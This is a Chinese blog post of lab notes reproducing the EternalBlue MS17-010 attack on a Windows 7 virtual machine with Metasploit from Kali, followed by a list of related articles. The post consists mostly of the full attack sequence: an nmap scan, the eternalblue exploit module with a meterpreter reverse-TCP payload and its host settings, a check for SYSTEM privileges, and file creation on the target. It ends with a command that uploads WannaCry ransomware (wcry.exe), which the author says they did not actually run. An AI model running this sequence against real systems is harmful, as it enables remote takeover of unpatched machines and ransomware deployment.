Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

已于 2022-10-09 18:43:18 修改
阅读量2.4k 收藏 17
点赞数 1
分类专栏: WEB学习 Metasploit 文章标签: 学习 网络 安全 永恒之蓝 kali
于 2022-10-06 21:40:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43965597/article/details/127187483
版权

文章目录

1. 前期准备

虚拟机:

  • kali
  • Windows 7

2. 保证受害者与攻击者主机能够通信

开启了两台虚拟机,保证在同一网段下

##Kali
ifconfig
##Windows 7
ipconfig

Kali攻击机IP为192.168.92.131
在这里插入图片描述
Windows下IP地址为192.168.92.136
在这里插入图片描述

两台虚拟机在同一网段,故可保持通信

3. 检查受害主机的TCP端口是否打开

nmap -sS 192.168.92.136

使用的是nmap模块,输入命令进行扫描
在这里插入图片描述
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用

4. 在msfconsole中查询漏洞利用模块

这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本

msfconsole
search ms17-010

在这里插入图片描述在这里插入图片描述

5. 利用永恒之蓝漏洞并设置相关参数

use exploit/windows/smb/ms17_010_eternalblue
##利用永恒之蓝漏洞
set payload windows/x64/meterpreter/reverse_tcp
##设置payload

在这里插入图片描述

set LHOST 192.168.92.131
##设置本机IP地址
set RHOSTS 192.168.92.136
##设置受害主机IP
set RPORT 445
##设置端口445,注意该端口共享功能是高危漏洞端口,包括之前分享的1393389等
exploit
##利用漏洞

在这里插入图片描述
看到WIN才说明利用成功,FAIL就是失败
在这里插入图片描述

6. 利用成功,获取WINDOWS系统管理员权限

getuid

返回系统管理员权限
在这里插入图片描述

7. 创建文件控制目标

cd ..
# 创建文件夹
mkdir hacker
# 访问目录
dir
cd hacker
# 创建文件并写入内容
echo helloworld>test.txt

在这里插入图片描述
就可以看到windows7电脑中新建了这么个文件
在这里插入图片描述

8.上传wannacry

我没这个病毒就不传了哈哈哈哈哈

shell
upload /root/wcry.exe c:\
Zichel77
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ms17-010永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5377
使用Kali Linux Metasploit复现永恒之蓝
nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河
m0_59302403的博客
03-22 3458
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。
利用Metasploit实现永恒之蓝漏洞复现
zxffdfh的博客
08-07 243
通过本次实验我了解到了Linux系统里面自带了很多有用的工具,例如Metasploit,使复杂的漏洞攻击简单化。我还了解到利用Metasploit实现漏洞攻击的步骤一般为:打开模块-配置模块-运行模块。
Metasploitable渗透测试:ms17-010
最新发布
sc_1999的博客
11-27 851
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。
使用metasploit(MSF)对windows的ms17-010漏洞进行利用
此博客内容主要是小可日常工作中的一些问题解决的记录整理而成
08-14 1227
Ping扫描-禁用端口扫描负责检查目标机是否有常见漏洞,如MS08-067。
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
网络安全-实验三ms17-010漏洞利用.docx
11-10
MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打补丁的系统。该漏洞利用的是SMB(Server Message ...
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
渗透基础笔记+作业(永恒之蓝复现
09-08
MS17-010,也称为“永恒之蓝”,是一个著名的漏洞,主要影响Windows操作系统,尤其是Windows 7。复现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架...
勒索病毒“WannaCry”之复现过程(永恒之蓝
weixin_40950781的博客
08-09 6772
勒索病毒“WannaCry”复现永恒之蓝)1.漏洞简述2.漏洞复现2.1复现环境2.3复现过程2.3.3 开始攻击3.结语4.防范 1.漏洞简述 “永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统;被扫描到的Windows系统,只要开机上线,不要要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等...
Metasploit-ms17-010永恒之蓝
algae
04-21 6393
永恒之蓝是去年玩剩下的了,记得当初刚刚泄露的时候,用的是NSA那个fb.py脚本去复现漏洞的。现在Metasploit里面已经集成了17-010漏洞,渗透测试更加方便与正式化,内网中用17-010去测一测会发现意外惊喜哦。 写在前面起初在Docker环境下最后执行exploit的时候总是拿不到sessions,换了很多系统失败了很多次。...
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3402
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4123
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
Metasploit 利用 MS17-010漏洞永恒之蓝
test
11-20 1万+
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS17-10(永恒之蓝) ...
Python脚本与Metasploit交互进行自动永恒之蓝攻击
谢公子的博客
11-12 4788
我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最后调用 MSF 框架读取配置文件进行攻击! # -*- coding: utf-8 -*- """ Created on Sun Nov 12 09:11:33 2018 @author: 小谢...
Metasploit的Docker安装及其Eternal Blue(永恒之蓝)渗透实现
Mi1k7ea
08-11 7700
在Docker上pull下来的msf是默认已带有ms17_010_eternalblue利用模块的,这里就简单地演示一遍该模块来获取win7的shell。 Pull并安装msf容器: 先查找docker上的Metasploit镜像: docker search metasploit 选择第一个pull就好: docker pull linuxkonsult/kali-metasp
Kali Linux下利用永恒之蓝漏洞发起攻击获取Shell
热门推荐
时光途径
06-06 1万+
Material:        Computer         VMware 12        Kali Linux.ISO        InternetFirst:    Open Your Computer and VMware:Second Open Your SSH Connection Tools, Eg Securt CRT,Putty.......Input Msfconso...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值